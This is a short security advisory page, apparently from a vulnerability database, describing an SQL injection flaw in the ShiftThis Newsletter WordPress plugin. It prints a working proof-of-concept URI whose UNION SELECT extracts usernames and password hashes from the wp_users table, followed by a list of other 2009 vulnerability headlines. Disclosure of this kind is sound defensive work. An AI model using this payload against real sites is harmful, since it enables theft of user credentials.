exploits , vulnerabilities , articles , WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability

Title	WordPress Plugin ShiftThis Newsletter SQL Injection Vulnerability
Published	2008-02-03-12:00AM
Updated	2008-02-04-09:27PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	S@BUN discovered this vulnerability.
Vulnerable	ShiftThis ShiftThis Newsletter 0
Not Vulnerable
Code	An attacker can exploit this issue via a browser.The following proof-of-concept URI is available:http://www.example.com/wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-11 Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Perl CGI Executables Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Unspecified Stack Buffer Overflow Vulnerability
• 2009-12-11 Joomla! JS Jobs Component Multiple SQL Injection Vulnerabilities
• 2009-12-11 RT Session Fixation Vulnerability
• 2009-12-11 Multiple HP LaserJet Printers Unauthorized Access and Denial of Service Vulnerability
• 2009-12-11 Sun Ray Server Authentication Manager Remote Code Execution Vulnerability
• 2009-12-10 GNU Coreutils Insecure Temporary File Creation Vulnerability
• 2009-12-10 WebKit SVG Animation Elements User After Free Remote Code Execution Vulnerability
• 2009-12-10 Moodle Multiple Vulnerabilities

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 07:07:46 +0000